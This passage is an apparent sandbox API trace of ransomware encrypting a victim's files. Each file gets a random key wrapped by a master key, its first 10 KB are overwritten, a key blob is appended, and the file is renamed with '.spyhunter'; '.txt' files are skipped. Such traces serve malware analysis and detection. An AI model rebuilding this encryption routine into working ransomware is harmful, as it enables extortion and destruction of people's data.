0x2c375d8 [0147.840] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edac*=0x2800, lpOverlapped=0x0) returned 1 [0147.841] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.841] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edac*=0x2800, lpOverlapped=0x0) returned 1 [0147.841] GetProcessHeap () returned 0x2c0000 [0147.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.841] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.841] WriteFile (in: hFile=0x178, lpBuffer=0x57edec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x57edec*, lpNumberOfBytesWritten=0x57edac*=0x4, lpOverlapped=0x0) returned 1 [0147.841] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edac*=0x30, lpOverlapped=0x0) returned 1 [0147.841] CloseHandle (hObject=0x178) returned 1 [0147.842] GetProcessHeap () returned 0x2c0000 [0147.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.842] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qO_Ig1GAKR_TcFkV.m4a.spyhunter") returned 70 [0147.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qO_Ig1GAKR_TcFkV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qo_ig1gakr_tcfkv.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qO_Ig1GAKR_TcFkV.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qo_ig1gakr_tcfkv.m4a.spyhunter")) returned 1 [0147.842] GetProcessHeap () returned 0x2c0000 [0147.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.842] GetProcessHeap () returned 0x2c0000 [0147.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.842] GetProcessHeap () returned 0x2c0000 [0147.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f408 | out: hHeap=0x2c0000) returned 1 [0147.842] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ede8 | out: pbBuffer=0x57ede8) returned 1 [0147.843] GetProcessHeap () returned 0x2c0000 [0147.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ede0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ede0*=0x30) returned 1 [0147.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nRpMod_hh5eDAn1SOSE.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nrpmod_hh5edan1sose.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nRpMod_hh5eDAn1SOSE.wav") returned 63 [0147.843] StrStrW (lpFirst="nRpMod_hh5eDAn1SOSE.wav", lpSrch=".txt") returned 0x0 [0147.843] GetProcessHeap () returned 0x2c0000 [0147.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.843] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.844] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.844] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.844] GetProcessHeap () returned 0x2c0000 [0147.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.844] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.844] WriteFile (in: hFile=0x178, lpBuffer=0x57ede4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x57ede4*, lpNumberOfBytesWritten=0x57eda4*=0x4, lpOverlapped=0x0) returned 1 [0147.844] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57eda4*=0x30, lpOverlapped=0x0) returned 1 [0147.844] CloseHandle (hObject=0x178) returned 1 [0147.845] GetProcessHeap () returned 0x2c0000 [0147.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.845] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nRpMod_hh5eDAn1SOSE.wav.spyhunter") returned 73 [0147.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nRpMod_hh5eDAn1SOSE.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nrpmod_hh5edan1sose.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nRpMod_hh5eDAn1SOSE.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nrpmod_hh5edan1sose.wav.spyhunter")) returned 1 [0147.845] GetProcessHeap () returned 0x2c0000 [0147.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.845] GetProcessHeap () returned 0x2c0000 [0147.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.845] GetProcessHeap () returned 0x2c0000 [0147.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f340 | out: hHeap=0x2c0000) returned 1 [0147.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ede8 | out: pbBuffer=0x57ede8) returned 1 [0147.846] GetProcessHeap () returned 0x2c0000 [0147.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ede0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ede0*=0x30) returned 1 [0147.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jM1flDhR2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jm1fldhr2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jM1flDhR2.m4a") returned 53 [0147.846] StrStrW (lpFirst="jM1flDhR2.m4a", lpSrch=".txt") returned 0x0 [0147.846] GetProcessHeap () returned 0x2c0000 [0147.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.846] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.847] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.847] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57eda4*=0x2800, lpOverlapped=0x0) returned 1 [0147.847] GetProcessHeap () returned 0x2c0000 [0147.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.847] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.847] WriteFile (in: hFile=0x178, lpBuffer=0x57ede4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x57ede4*, lpNumberOfBytesWritten=0x57eda4*=0x4, lpOverlapped=0x0) returned 1 [0147.847] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eda4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57eda4*=0x30, lpOverlapped=0x0) returned 1 [0147.848] CloseHandle (hObject=0x178) returned 1 [0147.848] GetProcessHeap () returned 0x2c0000 [0147.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.848] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jM1flDhR2.m4a.spyhunter") returned 63 [0147.848] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jM1flDhR2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jm1fldhr2.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jM1flDhR2.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jm1fldhr2.m4a.spyhunter")) returned 1 [0147.848] GetProcessHeap () returned 0x2c0000 [0147.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.848] GetProcessHeap () returned 0x2c0000 [0147.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.848] GetProcessHeap () returned 0x2c0000 [0147.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2720 | out: hHeap=0x2c0000) returned 1 [0147.849] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ede0 | out: pbBuffer=0x57ede0) returned 1 [0147.849] GetProcessHeap () returned 0x2c0000 [0147.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.849] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edd8*=0x30) returned 1 [0147.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iYaBF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\iyabf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iYaBF.wav") returned 49 [0147.849] StrStrW (lpFirst="iYaBF.wav", lpSrch=".txt") returned 0x0 [0147.849] GetProcessHeap () returned 0x2c0000 [0147.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.849] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed9c*=0x2800, lpOverlapped=0x0) returned 1 [0147.850] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.850] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed9c*=0x2800, lpOverlapped=0x0) returned 1 [0147.850] GetProcessHeap () returned 0x2c0000 [0147.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.850] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.850] WriteFile (in: hFile=0x178, lpBuffer=0x57eddc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x57eddc*, lpNumberOfBytesWritten=0x57ed9c*=0x4, lpOverlapped=0x0) returned 1 [0147.850] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed9c*=0x30, lpOverlapped=0x0) returned 1 [0147.850] CloseHandle (hObject=0x178) returned 1 [0147.851] GetProcessHeap () returned 0x2c0000 [0147.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.851] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iYaBF.wav.spyhunter") returned 59 [0147.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iYaBF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\iyabf.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iYaBF.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\iyabf.wav.spyhunter")) returned 1 [0148.071] GetProcessHeap () returned 0x2c0000 [0148.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0148.072] GetProcessHeap () returned 0x2c0000 [0148.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0148.072] GetProcessHeap () returned 0x2c0000 [0148.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf6f0 | out: hHeap=0x2c0000) returned 1 [0148.072] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ede0 | out: pbBuffer=0x57ede0) returned 1 [0148.072] GetProcessHeap () returned 0x2c0000 [0148.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0148.072] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edd8*=0x30) returned 1 [0148.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\1kSuhOQ9YFMtKhj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\1ksuhoq9yfmtkhj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0148.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\1kSuhOQ9YFMtKhj.mp3") returned 66 [0148.072] StrStrW (lpFirst="1kSuhOQ9YFMtKhj.mp3", lpSrch=".txt") returned 0x0 [0148.072] GetProcessHeap () returned 0x2c0000 [0148.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.072] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed9c*=0x2800, lpOverlapped=0x0) returned 1 [0148.075] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.075] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed9c*=0x2800, lpOverlapped=0x0) returned 1 [0148.075] GetProcessHeap () returned 0x2c0000 [0148.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.075] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.076] WriteFile (in: hFile=0x178, lpBuffer=0x57eddc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x57eddc*, lpNumberOfBytesWritten=0x57ed9c*=0x4, lpOverlapped=0x0) returned 1 [0148.076] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed9c*=0x30, lpOverlapped=0x0) returned 1 [0148.076] CloseHandle (hObject=0x178) returned 1 [0148.190] GetProcessHeap () returned 0x2c0000 [0148.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0148.190] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\1kSuhOQ9YFMtKhj.mp3.spyhunter") returned 76 [0148.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\1kSuhOQ9YFMtKhj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\1ksuhoq9yfmtkhj.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\1kSuhOQ9YFMtKhj.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\1ksuhoq9yfmtkhj.mp3.spyhunter")) returned 1 [0148.212] GetProcessHeap () returned 0x2c0000 [0148.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0148.212] GetProcessHeap () returned 0x2c0000 [0148.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0148.212] GetProcessHeap () returned 0x2c0000 [0148.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5d08 | out: hHeap=0x2c0000) returned 1 [0148.212] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edd8 | out: pbBuffer=0x57edd8) returned 1 [0148.212] GetProcessHeap () returned 0x2c0000 [0148.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0148.213] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edd0*=0x30) returned 1 [0148.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0148.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0148.213] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0148.213] GetProcessHeap () returned 0x2c0000 [0148.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.213] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed94*=0x244, lpOverlapped=0x0) returned 1 [0148.214] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.214] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed94*=0x244, lpOverlapped=0x0) returned 1 [0148.214] GetProcessHeap () returned 0x2c0000 [0148.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.214] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.214] WriteFile (in: hFile=0x178, lpBuffer=0x57edd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x57edd4*, lpNumberOfBytesWritten=0x57ed94*=0x4, lpOverlapped=0x0) returned 1 [0148.214] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed94*=0x30, lpOverlapped=0x0) returned 1 [0148.214] CloseHandle (hObject=0x178) returned 1 [0148.215] GetProcessHeap () returned 0x2c0000 [0148.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0148.215] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.spyhunter") returned 61 [0148.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.spyhunter")) returned 1 [0149.206] GetProcessHeap () returned 0x2c0000 [0149.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.206] GetProcessHeap () returned 0x2c0000 [0149.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.206] GetProcessHeap () returned 0x2c0000 [0149.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf4e0 | out: hHeap=0x2c0000) returned 1 [0149.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edd8 | out: pbBuffer=0x57edd8) returned 1 [0149.206] GetProcessHeap () returned 0x2c0000 [0149.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.207] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edd0*=0x30) returned 1 [0149.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiuNJyqAqKnq_qT_VkiU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiunjyqaqknq_qt_vkiu.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qiuNJyqAqKnq_qT_VkiU.swf") returned 66 [0149.207] StrStrW (lpFirst="qiuNJyqAqKnq_qT_VkiU.swf", lpSrch=".txt") returned 0x0 [0149.207] GetProcessHeap () returned 0x2c0000 [0149.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.207] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed94*=0x2800, lpOverlapped=0x0) returned 1 [0149.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.208] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed94*=0x2800, lpOverlapped=0x0) returned 1 [0149.208] GetProcessHeap () returned 0x2c0000 [0149.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.208] WriteFile (in: hFile=0x178, lpBuffer=0x57edd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed94, lpOverlapped=0x0 | out: lpBuffer=0x57edd4*, lpNumberOfBytesWritten=0x57ed94*=0x4, lpOverlapped=0x0) returned 1 [0149.209] WriteFile (in: 